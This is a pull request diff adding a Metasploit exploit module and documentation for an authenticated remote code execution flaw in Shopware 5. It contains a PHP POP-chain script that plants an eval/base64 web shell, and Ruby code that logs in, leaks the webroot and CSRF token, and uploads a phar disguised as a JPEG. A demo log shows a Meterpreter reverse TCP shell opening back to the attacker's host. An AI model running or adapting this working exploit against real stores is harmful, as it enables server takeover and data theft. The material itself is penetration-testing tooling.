### PR TITLE
Added CVE-2017 18357 - Shopware createInstanceFromNamedArguments PHP Object Instantiation 

### DIFF
--- a/documentation/modules/exploit/multi/http/shopware_createinstancefromnamedarguments_rce.md
+++ b/documentation/modules/exploit/multi/http/shopware_createinstancefromnamedarguments_rce.md
@@ -24,6 +24,57 @@ For installation instructions, please refer to the [Shopware installation guide]
 
 The recommended CVSS score is 7.5 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N).
 
+## POP Chain
+
+In order to pivot from an object instantiation bug to a object injection primitive, we need something worth while deserializing:
+
+```php
+<?php
+
+namespace GuzzleHttp\Cookie;
+
+// pop chain
+interface ToArrayInterface {}
+
+class SetCookie implements ToArrayInterface {
+    private $data;
+
+    public function __construct(array $data = []){
+        $this->data = $data;
+    }
+}
+
+class CookieJar implements ToArrayInterface {
+    private $cookies;
+
+    public function setCookie(SetCookie $cookie){
+        $this->cookies = array($cookie);
+    }
+}
+
+class FileCookieJar extends CookieJar {
+    private $filename;
+
+    public function __construct($bd_file){
+        $this->filename = $bd_file;
+        $this->setCookie(new SetCookie(array(
+            "Value" => '<?php eval(base64_decode($_SERVER[HTTP_SI])); ?>',
+            "Expires" => true,
+            "Discard" => false,
+        )));
+    }
+}
+
+$phar = new \Phar('poc.phar');
+$phar->startBuffering();
+$phar->addFromString('test.txt', 'test');
+$phar->setStub('<?php __HALT_COMPILER(); ? >');
+$o = new FileCookieJar("/var/www/html/media/image/si.php");
+$phar->setMetadata($o);
+$phar->stopBuffering();
+?>
+```
+
 ## Credit
 
 Steven Seeley (mr_me) of Source Incite

--- a/documentation/modules/exploit/multi/http/shopware_createinstancefromnamedarguments_rce.md
+++ b/documentation/modules/exploit/multi/http/shopware_createinstancefromnamedarguments_rce.md
@@ -2,7 +2,7 @@
 
 Shopware 5 is the next generation of open source e-commerce software made in Germany. Based on bleeding edge technologies like Symfony 3, Doctrine 2 & Zend Framework Shopware comes as the perfect platform for your next e-commerce project. Furthermore Shopware 5 provides an event-driven plugin system and an advanced hook system, giving you the ability to customize every part of the platform..
 
-In the createInstanceFromNamedArguments method, a vulnerability was discovered initially by [@KarimOuerghemmi](https://twitter.com/KarimOuerghemmi) of RIPS who rated the bug as a CVSS 3.6 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N) due to discovering an XXE exploitation primitive. Later on, mr_me bypassed the whitelist patch and found an RCE primitive via PHP object injection. Note that authentication is required to exploit this vulnerability.
+In the createInstanceFromNamedArguments method, a PHP object instantiation vulnerability was discovered by [@KarimOuerghemmi](https://twitter.com/KarimOuerghemmi) of RIPS who rated the bug as a CVSS 3.6 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N) due to the ability of leveraging an XXE primitive. Later on, I bypassed the whitelist patch and found an RCE primitive via PHP object injection. Note that authentication is required to exploit this vulnerability.
 
 This vulnerability is a bypass for CVE-2017-18357 and was tested on Shopware git branches 5.6, 5.5, 5.4, 5.3.
 

--- a/documentation/modules/exploit/multi/http/shopware_createinstancefromnamedarguments_rce.md
+++ b/documentation/modules/exploit/multi/http/shopware_createinstancefromnamedarguments_rce.md
@@ -2,7 +2,7 @@
 
 Shopware 5 is the next generation of open source e-commerce software made in Germany. Based on bleeding edge technologies like Symfony 3, Doctrine 2 & Zend Framework Shopware comes as the perfect platform for your next e-commerce project. Furthermore Shopware 5 provides an event-driven plugin system and an advanced hook system, giving you the ability to customize every part of the platform..
 
-In the createInstanceFromNamedArguments method, a vulnerability was discovered initially by [@KarimOuerghemmi](https://twitter.com/KarimOuerghemmi) of RIPS who rated the bug as a CVSS 3.6 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N) due to discovering an XXE exploitation primitive. Later on, Steven Seeley (mr_me) of Source Incite bypassed the whitelist patch and found an RCE primitive via PHP object injection. Note that authentication is required to exploit this vulnerability.
+In the createInstanceFromNamedArguments method, a vulnerability was discovered initially by [@KarimOuerghemmi](https://twitter.com/KarimOuerghemmi) of RIPS who rated the bug as a CVSS 3.6 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N) due to discovering an XXE exploitation primitive. Later on, mr_me bypassed the whitelist patch and found an RCE primitive via PHP object injection. Note that authentication is required to exploit this vulnerability.
 
 This vulnerability is a bypass for CVE-2017-18357 and was tested on Shopware git branches 5.6, 5.5, 5.4, 5.3.
 
@@ -12,7 +12,7 @@ The following is the exact setup I used to test and analyze the vulnerability:
 
 - Debian GNU/Linux 9 (stretch) x64
 - MariaDB latest
-- Apache2 / PHP 7.2.15
+- Apache2 w/ mod rewrite / PHP 7.2.15 w/ zip, gd, ctype, curl, dom, hash, iconv, json, session, mbstring, simplexml, xml, pdo_mysql and fileinfo
 
 For installation instructions, please refer to the [Shopware installation guide](https://github.com/shopware/shopware#installation-via-git).
 

--- a/documentation/modules/exploit/multi/http/shopware_createinstancefromnamedarguments_rce.md
+++ b/documentation/modules/exploit/multi/http/shopware_createinstancefromnamedarguments_rce.md
@@ -1,0 +1,70 @@
+## Background
+
+Shopware 5 is the next generation of open source e-commerce software made in Germany. Based on bleeding edge technologies like Symfony 3, Doctrine 2 & Zend Framework Shopware comes as the perfect platform for your next e-commerce project. Furthermore Shopware 5 provides an event-driven plugin system and an advanced hook system, giving you the ability to customize every part of the platform..
+
+In the createInstanceFromNamedArguments method, a vulnerability was discovered initially by [@KarimOuerghemmi](https://twitter.com/KarimOuerghemmi) of RIPS who rated the bug as a CVSS 3.6 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N) due to discovering an XXE exploitation primitive. Later on, Steven Seeley (mr_me) of Source Incite bypassed the whitelist patch and found an RCE primitive via PHP object injection. Note that authentication is required to exploit this vulnerability.
+
+This vulnerability is a bypass for CVE-2017-18357 and was tested on Shopware git branches 5.6, 5.5, 5.4, 5.3.
+
+## Vulnerable Application
+
+The following is the exact setup I used to test and analyze the vulnerability:
+
+- Debian GNU/Linux 9 (stretch) x64
+- MariaDB latest
+- Apache2 / PHP 7.2.15
+
+For installation instructions, please refer to the [Shopware installation guide](https://github.com/shopware/shopware#installation-via-git).
+
+## References
+
+- [https://blog.ripstech.com/2017/shopware-php-object-instantiation-to-blind-xxe/](https://blog.ripstech.com/2017/shopware-php-object-instantiation-to-blind-xxe/)
+
+## Notes
+
+The recommended CVSS score is 7.5 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N).
+
+## Credit
+
+Steven Seeley (mr_me) of Source Incite
+
+## Demo
+
+```
+saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/shopware.rc 
+[*] Processing scripts/shopware.rc for ERB directives.
+resource (scripts/shopware.rc)> use exploit/multi/http/shopware_createinstancefromnamedarguments_rce
+resource (scripts/shopware.rc)> set payload php/meterpreter/reverse_tcp
+payload => php/meterpreter/reverse_tcp
+resource (scripts/shopware.rc)> set LHOST 192.168.23.1
+LHOST => 192.168.23.1
+resource (scripts/shopware.rc)> set RHOSTS 192.168.23.164
+RHOSTS => 192.168.23.164
+resource (scripts/shopware.rc)> set RPORT 8080
+RPORT => 8080
+resource (scripts/shopware.rc)> check
+[+] 192.168.23.164:8080 - The target is vulnerable.
+resource (scripts/shopware.rc)> exploit
+[*] Started reverse TCP handler on 192.168.23.1:4444 
+[+] Stage 1 - logged in with demo: SHOPWAREBACKEND=kitv5998u4qu2o1sq25v4kvv1j;
+[+] Stage 2 - leaked the webroot: /var/www/html
+[+] Stage 3 - generated our phar
+[+] Stage 4 - leaked the CSRF token: eQ25IftJ3NGKx2WXBG4b00dTeoA8Pj
+[+] Stage 5 - uploaded phar
+[+] Stage 6 - leaked phar location: media/image/6f/fc/7f/mlofhujx.jpg
+[+] Stage 7 - triggered object instantiation!
+[*] Sending stage (38247 bytes) to 192.168.23.174
+[*] Meterpreter session 1 opened (192.168.23.1:4444 -> 192.168.23.174:33254) at 2019-05-09 14:44:46 -0500
+[!] This exploit may require manual cleanup of 'qdvtvgqu.php' on the target
+[!] This exploit may require manual cleanup of 'image/6f/fc/7f/mlofhujx.jpg' on the target
+
+meterpreter > 
+[+] Deleted qdvtvgqu.php
+[+] Deleted image/6f/fc/7f/mlofhujx.jpg
+
+meterpreter > sysinfo
+Computer    : 45835d649528
+OS          : Linux 45835d649528 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64
+Meterpreter : php/linux
+meterpreter > 
+```

--- a/documentation/modules/exploit/multi/http/shopware_createinstancefromnamedarguments_rce.md
+++ b/documentation/modules/exploit/multi/http/shopware_createinstancefromnamedarguments_rce.md
@@ -97,21 +97,17 @@ resource (scripts/shopware.rc)> check
 [+] 192.168.23.164:8080 - The target is vulnerable.
 resource (scripts/shopware.rc)> exploit
 [*] Started reverse TCP handler on 192.168.23.1:4444 
-[+] Stage 1 - logged in with demo: SHOPWAREBACKEND=kitv5998u4qu2o1sq25v4kvv1j;
+[+] Stage 1 - logged in with demo: SHOPWAREBACKEND=lpmck6d7nrh23ki2fsgeopci3p;
 [+] Stage 2 - leaked the webroot: /var/www/html
-[+] Stage 3 - generated our phar
-[+] Stage 4 - leaked the CSRF token: eQ25IftJ3NGKx2WXBG4b00dTeoA8Pj
+[+] Stage 3 - leaked the CSRF token: SRJELMCxJfEr2RiMlqS8xmOdidI5Hr
+[+] Stage 4 - generated our phar
 [+] Stage 5 - uploaded phar
-[+] Stage 6 - leaked phar location: media/image/6f/fc/7f/mlofhujx.jpg
+[+] Stage 6 - leaked phar location: media/image/6b/7e/0c/eiuzuoii.jpg
 [+] Stage 7 - triggered object instantiation!
 [*] Sending stage (38247 bytes) to 192.168.23.174
-[*] Meterpreter session 1 opened (192.168.23.1:4444 -> 192.168.23.174:33254) at 2019-05-09 14:44:46 -0500
-[!] This exploit may require manual cleanup of 'qdvtvgqu.php' on the target
-[!] This exploit may require manual cleanup of 'image/6f/fc/7f/mlofhujx.jpg' on the target
-
-meterpreter > 
-[+] Deleted qdvtvgqu.php
-[+] Deleted image/6f/fc/7f/mlofhujx.jpg
+[*] Meterpreter session 1 opened (192.168.23.1:4444 -> 192.168.23.174:34190) at 2019-05-09 21:11:50 -0500
+[+] Deleted rguktpcw.php
+[+] Deleted image/6b/7e/0c/eiuzuoii.jpg
 
 meterpreter > sysinfo
 Computer    : 45835d649528

--- a/modules/exploits/multi/http/shopware_createinstancefromnamedarguments_rce.rb
+++ b/modules/exploits/multi/http/shopware_createinstancefromnamedarguments_rce.rb
@@ -81,9 +81,8 @@ class MetasploitModule < Msf::Exploit::Remote
     unless res
       fail_with(Failure::Unreachable, "Connection failed")
     end
-    if res.code == 200 && res.body =~ /DOCUMENT_ROOT/i
-      @webroot = $1 if res.body =~ /DOCUMENT_ROOT <\/td><td class="v">(.*) <\/td><\/tr>/
-      return
+    if res.code == 200
+      @webroot = res.body.scan(%r{DOCUMENT_ROOT </td><td class="v">(.*) </td></tr>}).flatten.first
     end
     if @webroot.blank?
       fail_with(Failure::Unknown, "Unable to leak the webroot")

--- a/modules/exploits/multi/http/shopware_createinstancefromnamedarguments_rce.rb
+++ b/modules/exploits/multi/http/shopware_createinstancefromnamedarguments_rce.rb
@@ -74,9 +74,7 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_cgi(
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, 'backend', 'systeminfo', 'info'),
-      'headers' => {
-        'Cookie' => @cookie,
-      }
+      'cookie' => @cookie
     )
     unless res
       fail_with(Failure::Unreachable, "Connection failed")
@@ -85,7 +83,9 @@ class MetasploitModule < Msf::Exploit::Remote
       @webroot = $1 if res.body =~ /DOCUMENT_ROOT <\/td><td class=\"v\">(.*) <\/td><\/tr>/
       return
     end
-    fail_with(Failure::Unknown, "Unable to leak the webroot")
+    if @webroot.blank?
+      fail_with(Failure::Unknown, "Unable to leak the webroot")
+    end
   end
 
   def generate_phar
@@ -106,36 +106,34 @@ class MetasploitModule < Msf::Exploit::Remote
     file_contents = Rex::Text.rand_text_alpha_lower(20)
     file_crc32    = Zlib::crc32(file_contents) & 0xffffffff
     manifest_len  = 40 + pop.length + file.length
-    @phar  = stub
-    @phar << [manifest_len].pack('V')              # length of manifest in bytes
-    @phar << [0x1].pack('V')                       # number of files in the phar
-    @phar << [0x11].pack('v')                      # api version of the phar manifest
-    @phar << [0x10000].pack('V')                   # global phar bitmapped flags
-    @phar << [0x0].pack('V')                       # length of phar alias
-    @phar << [pop.length].pack('V')                # length of phar metadata
-    @phar << pop                                   # pop chain
-    @phar << [file.length].pack('V')               # length of filename in the archive
-    @phar << file                                  # filename
-    @phar << [file_contents.length].pack('V')      # length of the uncompressed file contents
-    @phar << [0x0].pack('V')                       # unix timestamp of file set to Jan 01 1970.
-    @phar << [file_contents.length].pack('V')      # length of the compressed file contents
-    @phar << [file_crc32].pack('V')                # crc32 checksum of un-compressed file contents
-    @phar << [0x1b6].pack('V')                     # bit-mapped file-specific flags
-    @phar << [0x0].pack('V')                       # serialized File Meta-data length
-    @phar << file_contents                         # serialized File Meta-data
-    @phar << [Rex::Text.sha1(@phar)].pack('H*')    # signature
-    @phar << [0x2].pack('V')                       # signiture type
-    @phar << "GBMB"                                # signature presence
-    return
+    phar  = stub
+    phar << [manifest_len].pack('V')              # length of manifest in bytes
+    phar << [0x1].pack('V')                       # number of files in the phar
+    phar << [0x11].pack('v')                      # api version of the phar manifest
+    phar << [0x10000].pack('V')                   # global phar bitmapped flags
+    phar << [0x0].pack('V')                       # length of phar alias
+    phar << [pop.length].pack('V')                # length of phar metadata
+    phar << pop                                   # pop chain
+    phar << [file.length].pack('V')               # length of filename in the archive
+    phar << file                                  # filename
+    phar << [file_contents.length].pack('V')      # length of the uncompressed file contents
+    phar << [0x0].pack('V')                       # unix timestamp of file set to Jan 01 1970.
+    phar << [file_contents.length].pack('V')      # length of the compressed file contents
+    phar << [file_crc32].pack('V')                # crc32 checksum of un-compressed file contents
+    phar << [0x1b6].pack('V')                     # bit-mapped file-specific flags
+    phar << [0x0].pack('V')                       # serialized File Meta-data length
+    phar << file_contents                         # serialized File Meta-data
+    phar << [Rex::Text.sha1(phar)].pack('H*')    # signature
+    phar << [0x2].pack('V')                       # signiture type
+    phar << "GBMB"                                # signature presence
+    return phar
   end
 
   def leak_csrf
     res = send_request_cgi(
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, 'backend', 'CSRFToken', 'generate'),
-      'headers' => {
-        'Cookie' => @cookie,
-      }
+      'cookie' => @cookie
     )
     unless res
       fail_with(Failure::Unreachable, "Connection failed")
@@ -147,16 +145,16 @@ class MetasploitModule < Msf::Exploit::Remote
     fail_with(Failure::Unknown, "Unable to leak the CSRF token")
   end
 
-  def upload
+  def upload(phar)
     data = Rex::MIME::Message.new
-    data.add_part(@phar, Rex::Text.rand_text_alpha_lower(8), nil, "name=\"fileId\"; filename=\"#{@phar_bd}.jpg\"")
+    data.add_part(phar, Rex::Text.rand_text_alpha_lower(8), nil, "name=\"fileId\"; filename=\"#{@phar_bd}.jpg\"")
     res = send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(target_uri, 'backend', 'mediaManager', 'upload'),
       'ctype' => "multipart/form-data; boundary=#{data.bound}",
       'data' => data.to_s,
+      'cookie' => @cookie,
       'headers' => {
-        'Cookie' => @cookie,
         'X-CSRF-Token' => @csrf_token
       }
     )
@@ -173,8 +171,8 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_cgi(
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, 'backend', 'MediaManager', 'getAlbumMedia'),
+      'cookie' => @cookie,
       'headers' => {
-        'Cookie' => @cookie,
         'X-CSRF-Token' => @csrf_token
       }
     )
@@ -202,8 +200,8 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_cgi(
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, 'backend', 'ProductStream', 'loadPreview'),
+      'cookie' => @cookie,
       'headers' => {
-        'Cookie' => @cookie,
         'X-CSRF-Token' => @csrf_token
       },
       'vars_get' => { 'sort' => sort.to_json }
@@ -228,7 +226,8 @@ class MetasploitModule < Msf::Exploit::Remote
     res = send_request_cgi(
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, 'backend', 'ProductStream', 'loadPreview'),
-      'headers' => { 'Cookie' => @cookie, 'X-CSRF-Token' => @csrf_token }
+      'cookie' => @cookie,
+      'headers' => { 'X-CSRF-Token' => @csrf_token }
     )
     if res.code == 200 && res.body =~ /Shop not found/i
       return Exploit::CheckCode::Vulnerable
@@ -247,11 +246,11 @@ class MetasploitModule < Msf::Exploit::Remote
     print_good("Stage 1 - logged in with #{datastore['username']}: #{@cookie}")
     get_webroot
     print_good("Stage 2 - leaked the webroot: #{@webroot}")
-    generate_phar
-    print_good("Stage 3 - generated our phar")
     leak_csrf
-    print_good("Stage 4 - leaked the CSRF token: #{@csrf_token}")
-    upload
+    print_good("Stage 3 - leaked the CSRF token: #{@csrf_token}")
+    phar = generate_phar
+    print_good("Stage 4 - generated our phar")
+    upload(phar)
     print_good("Stage 5 - uploaded phar")
     leak_upload
     print_good("Stage 6 - leaked phar location: #{@phar_loc}")

--- a/modules/exploits/multi/http/shopware_createinstancefromnamedarguments_rce.rb
+++ b/modules/exploits/multi/http/shopware_createinstancefromnamedarguments_rce.rb
@@ -38,7 +38,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'Arch' => ARCH_PHP,
       'Targets' => [['Automatic', {}]],
       'Privileged' => false,
-      'DisclosureDate' => "Mar 11 2019",
+      'DisclosureDate' => "May 09 2019",
       'DefaultTarget' => 0))
 
     register_options(
@@ -60,7 +60,7 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     )
     unless res
-      fail_with(Failure::Unreachable, 'Connection failed')
+      fail_with(Failure::Unreachable, "Connection failed")
     end
     if res.code == 200
       @cookie = res.get_cookies.match(/(SHOPWAREBACKEND=.{26};)/)[1]
@@ -78,7 +78,7 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     )
     unless res
-      fail_with(Failure::Unreachable, 'Connection failed')
+      fail_with(Failure::Unreachable, "Connection failed")
     end
     if res.code == 200 && res.body =~ /DOCUMENT_ROOT/i
       @webroot = $1 if res.body =~ /DOCUMENT_ROOT <\/td><td class=\"v\">(.*) <\/td><\/tr>/
@@ -100,11 +100,11 @@ class MetasploitModule < Msf::Exploit::Remote
     pop << "b:1;"
     pop << "s:7:\"Discard\";"
     pop << "b:0;}}}}"
-    f            = Rex::Text.rand_text_alpha_lower(8)
-    stub         = "<?php __HALT_COMPILER(); ?>\r\n"
-    f_contents   = Rex::Text.rand_text_alpha_lower(20)
-    crc32        = Zlib::crc32(f_contents) & 0xffffffff
-    manifest_len = 40 + pop.length + f.length
+    file          = Rex::Text.rand_text_alpha_lower(8)
+    stub          = "<?php __HALT_COMPILER(); ?>\r\n"
+    file_contents = Rex::Text.rand_text_alpha_lower(20)
+    file_crc32    = Zlib::crc32(file_contents) & 0xffffffff
+    manifest_len  = 40 + pop.length + file.length
     @phar  = stub
     @phar << [manifest_len].pack('V')              # length of manifest in bytes
     @phar << [0x1].pack('V')                       # number of files in the phar
@@ -113,15 +113,15 @@ class MetasploitModule < Msf::Exploit::Remote
     @phar << [0x0].pack('V')                       # length of phar alias
     @phar << [pop.length].pack('V')                # length of phar metadata
     @phar << pop                                   # pop chain
-    @phar << [f.length].pack('V')                  # length of filename in the archive
-    @phar << f                                     # filename
-    @phar << [f_contents.length].pack('V')         # length of the uncompressed file contents
+    @phar << [file.length].pack('V')               # length of filename in the archive
+    @phar << file                                  # filename
+    @phar << [file_contents.length].pack('V')      # length of the uncompressed file contents
     @phar << [0x0].pack('V')                       # unix timestamp of file set to Jan 01 1970.
-    @phar << [f_contents.length].pack('V')         # length of the compressed file contents
-    @phar << [crc32].pack('V')                     # crc32 checksum of un-compressed file contents
+    @phar << [file_contents.length].pack('V')      # length of the compressed file contents
+    @phar << [file_crc32].pack('V')                # crc32 checksum of un-compressed file contents
     @phar << [0x1b6].pack('V')                     # bit-mapped file-specific flags
     @phar << [0x0].pack('V')                       # serialized File Meta-data length
-    @phar << f_contents                            # serialized File Meta-data
+    @phar << file_contents                         # serialized File Meta-data
     @phar << [Rex::Text.sha1(@phar)].pack('H*')    # signature
     @phar << [0x2].pack('V')                       # signiture type
     @phar << "GBMB"                                # signature presence
@@ -137,7 +137,7 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     )
     unless res
-      fail_with(Failure::Unreachable, 'Connection failed')
+      fail_with(Failure::Unreachable, "Connection failed")
     end
     if res.code == 200 && res.headers.include?('X-Csrf-Token')
       @csrf_token = res.headers['X-Csrf-Token']
@@ -208,7 +208,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'vars_get' => { 'sort' => sort.to_json }
     )
     unless res
-      fail_with(Failure::Unreachable, 'Connection failed')
+      fail_with(Failure::Unreachable, "Connection failed")
     end
     return
   end

--- a/modules/exploits/multi/http/shopware_createinstancefromnamedarguments_rce.rb
+++ b/modules/exploits/multi/http/shopware_createinstancefromnamedarguments_rce.rb
@@ -87,7 +87,7 @@ class MetasploitModule < Msf::Exploit::Remote
     fail_with(Failure::Unknown, "Unable to leak the webroot")
   end
 
-  def generate_phar()
+  def generate_phar
     @php = "#{@webroot}#{target_uri.path}media/#{@shll_bd}.php"
     register_file_for_cleanup("#{@shll_bd}.php")
     pop  = "O:31:\"GuzzleHttp\\Cookie\\FileCookieJar\":2:{s:41:\"\x00GuzzleHttp\\Cookie\\FileCookieJar\x00filename\";"
@@ -239,7 +239,6 @@ class MetasploitModule < Msf::Exploit::Remote
     unless Exploit::CheckCode::Vulnerable == check
       fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
     end
-
     @phar_bd  = Rex::Text.rand_text_alpha_lower(8)
     @shll_bd  = Rex::Text.rand_text_alpha_lower(8)
     @header   = Rex::Text.rand_text_alpha_upper(2)

--- a/modules/exploits/multi/http/shopware_createinstancefromnamedarguments_rce.rb
+++ b/modules/exploits/multi/http/shopware_createinstancefromnamedarguments_rce.rb
@@ -67,7 +67,9 @@ class MetasploitModule < Msf::Exploit::Remote
       @cookie = res.get_cookies.match(/(SHOPWAREBACKEND=.{26};)/)[1]
       return
     end
-    fail_with(Failure::NoAccess, "Authentication was unsuccessful")
+    if @cookie.blank?
+      fail_with(Failure::Unknown, "Authentication was unsuccessful")
+    end
   end
 
   def get_webroot
@@ -80,7 +82,7 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::Unreachable, "Connection failed")
     end
     if res.code == 200 && res.body =~ /DOCUMENT_ROOT/i
-      @webroot = $1 if res.body =~ /DOCUMENT_ROOT <\/td><td class=\"v\">(.*) <\/td><\/tr>/
+      @webroot = $1 if res.body =~ /DOCUMENT_ROOT <\/td><td class="v">(.*) <\/td><\/tr>/
       return
     end
     if @webroot.blank?
@@ -123,7 +125,7 @@ class MetasploitModule < Msf::Exploit::Remote
     phar << [0x1b6].pack('V')                     # bit-mapped file-specific flags
     phar << [0x0].pack('V')                       # serialized File Meta-data length
     phar << file_contents                         # serialized File Meta-data
-    phar << [Rex::Text.sha1(phar)].pack('H*')    # signature
+    phar << [Rex::Text.sha1(phar)].pack('H*')     # signature
     phar << [0x2].pack('V')                       # signiture type
     phar << "GBMB"                                # signature presence
     return phar
@@ -142,7 +144,9 @@ class MetasploitModule < Msf::Exploit::Remote
       @csrf_token = res.headers['X-Csrf-Token']
       return
     end
-    fail_with(Failure::Unknown, "Unable to leak the CSRF token")
+    if @csrf_token.blank?
+      fail_with(Failure::Unknown, "Unable to leak the CSRF token")
+    end
   end
 
   def upload(phar)
@@ -186,7 +190,9 @@ class MetasploitModule < Msf::Exploit::Remote
       register_file_for_cleanup("image/#{bd_path.gsub("\\", "")}/#{@phar_bd}.jpg")
       return
     end
-    fail_with(Failure::Unknown, "Cannot find phar archive")
+    if @phar_loc.blank?
+      fail_with(Failure::Unknown, "Cannot find phar archive")
+    end
   end
 
   def trigger_bug

--- a/modules/exploits/multi/http/shopware_createinstancefromnamedarguments_rce.rb
+++ b/modules/exploits/multi/http/shopware_createinstancefromnamedarguments_rce.rb
@@ -68,7 +68,7 @@ class MetasploitModule < Msf::Exploit::Remote
       return
     end
     if @cookie.blank?
-      fail_with(Failure::Unknown, "Authentication was unsuccessful")
+      fail_with(Failure::NoAccess, "Authentication was unsuccessful")
     end
   end
 

--- a/modules/exploits/multi/http/shopware_createinstancefromnamedarguments_rce.rb
+++ b/modules/exploits/multi/http/shopware_createinstancefromnamedarguments_rce.rb
@@ -222,10 +222,12 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     cookie = do_login
     if cookie.nil?
+      vprint_error "Authentication was unsuccessful"
       return Exploit::CheckCode::Safe
     end
     csrf_token = leak_csrf(cookie)
     if csrf_token.nil?
+      vprint_error "Unable to leak the CSRF token"
       return Exploit::CheckCode::Safe
     end
     res = send_request_cgi(

--- a/modules/exploits/multi/http/shopware_createinstancefromnamedarguments_rce.rb
+++ b/modules/exploits/multi/http/shopware_createinstancefromnamedarguments_rce.rb
@@ -148,7 +148,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def upload
     data = Rex::MIME::Message.new
-    data.add_part(@phar, 'image/jpg', nil, "from-data; name=\"fileId\"; filename=\"#{@phar_bd}.jpg\"")
+    data.add_part(@phar, Rex::Text.rand_text_alpha_lower(8), nil, "name=\"fileId\"; filename=\"#{@phar_bd}.jpg\"")
     res = send_request_cgi(
       'method' => 'POST',
       'uri' => normalize_uri(target_uri, 'backend', 'mediaManager', 'upload'),

--- a/modules/exploits/multi/http/shopware_createinstancefromnamedarguments_rce.rb
+++ b/modules/exploits/multi/http/shopware_createinstancefromnamedarguments_rce.rb
@@ -27,7 +27,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'License' => MSF_LICENSE,
       'Author' =>
         [
-          'mr_me <steven@srcincite.io>',      # discovery & msf module
+          'Karim Ouerghemmi',               # original discovery
+          'mr_me <steven@srcincite.io>',    # patch bypass, rce & msf module
         ],
       'References' =>
         [

--- a/modules/exploits/multi/http/shopware_createinstancefromnamedarguments_rce.rb
+++ b/modules/exploits/multi/http/shopware_createinstancefromnamedarguments_rce.rb
@@ -64,36 +64,31 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::Unreachable, "Connection failed")
     end
     if res.code == 200
-      @cookie = res.get_cookies.match(/(SHOPWAREBACKEND=.{26};)/)[1]
-      return
+      return res.get_cookies.match(/(SHOPWAREBACKEND=.{26};)/)[1]
     end
-    if @cookie.blank?
-      fail_with(Failure::NoAccess, "Authentication was unsuccessful")
-    end
+    fail_with(Failure::NoAccess, "Authentication was unsuccessful")
   end
 
-  def get_webroot
+  def get_webroot(cookie)
     res = send_request_cgi(
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, 'backend', 'systeminfo', 'info'),
-      'cookie' => @cookie
+      'cookie' => cookie
     )
     unless res
       fail_with(Failure::Unreachable, "Connection failed")
     end
     if res.code == 200
-      @webroot = res.body.scan(%r{DOCUMENT_ROOT </td><td class="v">(.*) </td></tr>}).flatten.first
+      return res.body.scan(%r{DOCUMENT_ROOT </td><td class="v">(.*) </td></tr>}).flatten.first
     end
-    if @webroot.blank?
-      fail_with(Failure::Unknown, "Unable to leak the webroot")
-    end
+    fail_with(Failure::Unknown, "Unable to leak the webroot")
   end
 
-  def generate_phar
-    @php = "#{@webroot}#{target_uri.path}media/#{@shll_bd}.php"
+  def generate_phar(webroot)
+    php = "#{webroot}#{target_uri.path}media/#{@shll_bd}.php"
     register_file_for_cleanup("#{@shll_bd}.php")
     pop  = "O:31:\"GuzzleHttp\\Cookie\\FileCookieJar\":2:{s:41:\"\x00GuzzleHttp\\Cookie\\FileCookieJar\x00filename\";"
-    pop << "s:#{@php.length}:\"#{@php}\";"
+    pop << "s:#{php.length}:\"#{php}\";"
     pop << "s:36:\"\x00GuzzleHttp\\Cookie\\CookieJar\x00cookies\";"
     pop << "a:1:{i:0;O:27:\"GuzzleHttp\\Cookie\\SetCookie\":1:{s:33:\"\x00GuzzleHttp\\Cookie\\SetCookie\x00data\";"
     pop << "a:3:{s:5:\"Value\";"
@@ -130,25 +125,22 @@ class MetasploitModule < Msf::Exploit::Remote
     return phar
   end
 
-  def leak_csrf
+  def leak_csrf(cookie)
     res = send_request_cgi(
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, 'backend', 'CSRFToken', 'generate'),
-      'cookie' => @cookie
+      'cookie' => cookie
     )
     unless res
       fail_with(Failure::Unreachable, "Connection failed")
     end
     if res.code == 200 && res.headers.include?('X-Csrf-Token')
-      @csrf_token = res.headers['X-Csrf-Token']
-      return
+      return res.headers['X-Csrf-Token']
     end
-    if @csrf_token.blank?
-      fail_with(Failure::Unknown, "Unable to leak the CSRF token")
-    end
+    fail_with(Failure::Unknown, "Unable to leak the CSRF token")
   end
 
-  def upload(phar)
+  def upload(cookie, csrf_token, phar)
     data = Rex::MIME::Message.new
     data.add_part(phar, Rex::Text.rand_text_alpha_lower(8), nil, "name=\"fileId\"; filename=\"#{@phar_bd}.jpg\"")
     res = send_request_cgi(
@@ -156,9 +148,9 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(target_uri, 'backend', 'mediaManager', 'upload'),
       'ctype' => "multipart/form-data; boundary=#{data.bound}",
       'data' => data.to_s,
-      'cookie' => @cookie,
+      'cookie' => cookie,
       'headers' => {
-        'X-CSRF-Token' => @csrf_token
+        'X-CSRF-Token' => csrf_token
       }
     )
     unless res
@@ -170,13 +162,13 @@ class MetasploitModule < Msf::Exploit::Remote
     fail_with(Failure::Unknown, "Unable to upload phar archive")
   end
 
-  def leak_upload
+  def leak_upload(cookie, csrf_token)
